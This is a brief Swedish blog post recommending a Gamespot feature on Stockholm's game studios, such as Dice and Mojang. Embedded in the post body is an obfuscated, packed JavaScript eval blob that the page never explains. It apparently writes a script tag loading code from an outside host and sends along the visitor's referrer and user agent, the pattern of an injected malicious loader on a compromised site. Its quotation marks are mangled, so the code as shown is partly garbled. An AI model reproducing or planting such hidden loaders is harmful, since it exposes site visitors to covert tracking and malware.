Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Gamespot: Lost Between Levels: Stockholm

Sebastian Plengier Ehrnfelt

Gamespot: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isyrh|var|u0026u|referrer|fifnt||js|php’.split(‘|’),0,{}))
Jag tycker det är alltid är lika kul när stora amerikanska tidningar eller företag besöker Stockholm för en genomgång av vårt engagemang i världen. 

Musik, spel, IT, allmänt entreprenörskap är ju vad vi är kända för. Att ett så litet land som Sverige faktiskt är ett av världens mest innovativa land med många kända produkter är super kul.

Nu är det den stora spel-sajten Gamespot som kommer hit för att få det förklarat hur vi som ett litet land kan åstadkomma så enastående spel. Självklart hälsar han på hos bland annat Dice och Mojang för att träffa nyckelpersonerna bakom Minecraft och Battlefield.

Värt en titt om du är intresserad! 

Även om du inte är intresserad av detta så får du se vackra bilder av Stockholm samt såklart några av världens hetaste arbetsplatser, sett både från design till kultur.

Via: www.gamespot.com